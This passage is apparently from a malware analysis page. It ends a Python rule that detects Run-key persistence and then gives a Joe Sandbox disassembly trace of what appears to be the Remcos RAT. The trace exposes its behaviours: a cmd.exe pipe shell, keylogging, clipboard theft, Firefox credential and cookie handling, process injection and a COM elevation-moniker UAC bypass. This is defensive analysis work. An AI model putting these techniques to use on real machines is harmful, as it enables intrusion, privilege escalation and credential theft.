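    return [f for f in (check_event(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.hive}\\...\\Policies\\Explorer\\Run\\{f.value_name} = {f.data} (written by {f.image})")
```

In production, swap parse_event() for your export's parser and keep the key match, which is the part that carries the signal. Event ID 12 (key creation) is deliberately ignored because it carries no value data; the RegCreateKeyW call in the report would generate one before the RegSetValueExW that this rule catches.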

Control-flow Graph

control_flow_graph 685 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: (CG
• API String ID: 1925916568-4210230975
• Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
• Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
• Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
• Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
control_flow_graph 688 412513-41253f RegOpenKeyExA 689 412541-412567 RegQueryValueExA RegCloseKey 688->689 690 412572 688->690 689->690 692 412569-412570 689->692 691 412577-412583 call 401f66 690->691 692->691
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNEL32(?), ref: 0041255F
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
• Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
• Opcode Fuzzy Hash: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
• Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

Control-flow Graph

control_flow_graph 695 4124b7-4124df RegOpenKeyExA 696 4124e1-412509 RegQueryValueExA RegCloseKey 695->696 697 41250f-412512 695->697 696->697 698 41250b-41250e 696->698
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
• RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
• RegCloseKey.ADVAPI32(00000000), ref: 00412500
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
• Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
• Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
• Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

Control-flow Graph

control_flow_graph 727 448716-448721 728 448723-44872d 727->728 729 44872f-448735 727->729 728->729 730 448763-44876e call 445364 728->730 731 448737-448738 729->731 732 44874e-44875f RtlAllocateHeap 729->732 737 448770-448772 730->737 731->732 733 448761 732->733 734 44873a-448741 call 4447d5 732->734 733->737 734->730 740 448743-44874c call 442210 734->740 740->730 740->732
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448757
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
• Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
• Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
• Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD
APIs
• SetEvent.KERNEL32(?,?), ref: 00406F28
• GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
• DeleteFileW.KERNEL32(00000000), ref: 00407018
  • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
  • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
  • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
  • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
  • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
• DeleteFileA.KERNEL32(?), ref: 004078CC
  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• Sleep.KERNEL32(000007D0), ref: 00407976
• StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
  • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
• String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
• API String ID: 2918587301-599666313
• Opcode ID: 617277cc791489f5d4a9004504fc0227c35f05cf4c60253288cc452c9b7a6e02
• Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
• Opcode Fuzzy Hash: 617277cc791489f5d4a9004504fc0227c35f05cf4c60253288cc452c9b7a6e02
• Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
APIs
• __Init_thread_footer.LIBCMT ref: 0040508E
  • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
  • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• __Init_thread_footer.LIBCMT ref: 004050CB
• CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
• CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
  • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
  • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                                                                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                                                                            • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                                                                                                                                            • API String ID: 3815868655-1274243119
                                                                                                                                                                                                                                            • Opcode ID: cdf13e82471ad5efccb91d00ce4864fe8644f0f5189f5862159d9f8069fd826c
                                                                                                                                                                                                                                            • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdf13e82471ad5efccb91d00ce4864fe8644f0f5189f5862159d9f8069fd826c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                                                                            • API String ID: 65172268-860466531
                                                                                                                                                                                                                                            • Opcode ID: fb9dbb4756769c3cd24ee7adcec061e257e704e0881a6f9f62c6e3ac0e16f80b
                                                                                                                                                                                                                                            • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb9dbb4756769c3cd24ee7adcec061e257e704e0881a6f9f62c6e3ac0e16f80b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                                                                                                                                                            • Opcode ID: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                                                                                                                                                                                                            • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                            • API String ID: 3527384056-432212279
                                                                                                                                                                                                                                            • Opcode ID: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                                                                                                                                                                                                            • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
• CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
• API String ID: 726551946-3025026198
• Opcode ID: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
• Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
• Opcode Fuzzy Hash: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
• Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
APIs
• OpenClipboard.USER32 ref: 004159C7
• EmptyClipboard.USER32 ref: 004159D5
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
• GlobalLock.KERNEL32(00000000), ref: 004159FE
• GlobalUnlock.KERNEL32(00000000), ref: 00415A34
• SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID:
• API String ID: 3520204547-0
• Opcode ID: 42efddb075740920b0a99be8245ba2b7744cb55bc38d7abeb996d078b4737da1
• Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
• Opcode Fuzzy Hash: 42efddb075740920b0a99be8245ba2b7744cb55bc38d7abeb996d078b4737da1
• Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
• Opcode ID: 0fcdf3723bd403450e4658182a616b4124205e679a17675a4039e88decae9ffb
• Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
• Opcode Fuzzy Hash: 0fcdf3723bd403450e4658182a616b4124205e679a17675a4039e88decae9ffb
• Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
APIs
• GetForegroundWindow.USER32 ref: 00409B3F
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
• GetKeyboardLayout.USER32(00000000), ref: 00409B52
• GetKeyState.USER32(00000010), ref: 00409B5C
• GetKeyboardState.USER32(?), ref: 00409B67
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: X[G
• API String ID: 1888522110-739899062
• Opcode ID: 485c3068d46bbc27ad7f154d56eccfa046da84bd8fffb3f19a1bbf4f86c2e43c
• Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
• Opcode Fuzzy Hash: 485c3068d46bbc27ad7f154d56eccfa046da84bd8fffb3f19a1bbf4f86c2e43c
• Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
APIs
• _wcslen.LIBCMT ref: 00406788
• CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
• Opcode ID: 1499520d982b2c6fe98523ebb7f19fcc58a9361d149757f2a1a63c157573ad6f
• Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
• Opcode Fuzzy Hash: 1499520d982b2c6fe98523ebb7f19fcc58a9361d149757f2a1a63c157573ad6f
• Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
• GetLastError.KERNEL32 ref: 00419945
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
• Opcode ID: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
• Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
• Opcode Fuzzy Hash: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
• Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B539
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B546
                                                                                                                                                                                                                                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B580
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B593
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2341273852-0
                                                                                                                                                                                                                                            • Opcode ID: 9bd09a2d99c30552ee9248d9d3ead224cb3624160a648d3944adbeb409a266ec
